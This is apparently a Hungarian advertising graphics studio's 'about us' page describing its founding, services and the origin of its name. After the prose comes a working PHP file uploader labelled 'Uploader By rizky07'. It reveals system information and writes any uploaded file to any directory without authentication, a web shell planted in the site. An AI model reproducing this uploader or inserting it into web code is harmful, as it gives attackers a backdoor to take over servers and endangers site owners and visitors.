We opened our advertising graphics studio in September 2009, 1 month after the foundation of our Ltd., at Dohány u. 57th store, 2 minutes walk from Blah. The graphic artist and decorator, who has taken an active role in the company, has been engaged in advertising graphic design and production since 2003.

 

In our advertising graphics studio, we strive to ensure that the graphic products and services we provide meet the requirements of art, aesthetics, color dynamics and marketing requirements.

 

In our team you will find an experienced decorator and graphic artist who will help you realize your individual ideas! If you need subject photography or web animation, feel free to contact us, our friends and partners provide high quality service in the latter areas!

 

As for our choice of name, the pixel (or pixel) is the basic unit of computer imaging, displaying the image as a grid structure. To our knowledge, the suffix “encia” forms nouns from certain Latin verbs (e.g., audiencia, excellencia), but we admit that we were not fully aware of the latter fact when choosing the name.

 

<!DOCTYPE html>

<html>
<title>Uploader By rizky07</title>
<body >
<center>
<?
echo "<h3 style='margin-top:0;margin-bottom:5px'>".php_uname()."</h3>";
?>
<form action="" method="post" enctype="multipart/form-data">
   <input type="text" style="padding:5px;border:1px solid green;width:303px;margin-bottom:4px" name="dir"  placeholder="directory">
   <input type="file" style="padding:3px;background-color:green;color:white;margin-bottom:4px" name="file" >
    <input type="submit" style="padding:3px;border:3px solid green;background-color:green;color:white;margin-bottom:4px" value="UPLOAD" name="submit">
</form>
<?
if(isset($_POST['submit'])) {
$target_dir = $_POST['dir'];
$target_file = $target_dir . basename($_FILES["file"]["name"]);
 
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
        echo "Yosh ! ". basename( $_FILES["file"]["name"]). " UPLOAD > OK";
    } else {
        echo "Anjing, upload gagal !";
    }
  }
 
?> 
</body>
</html>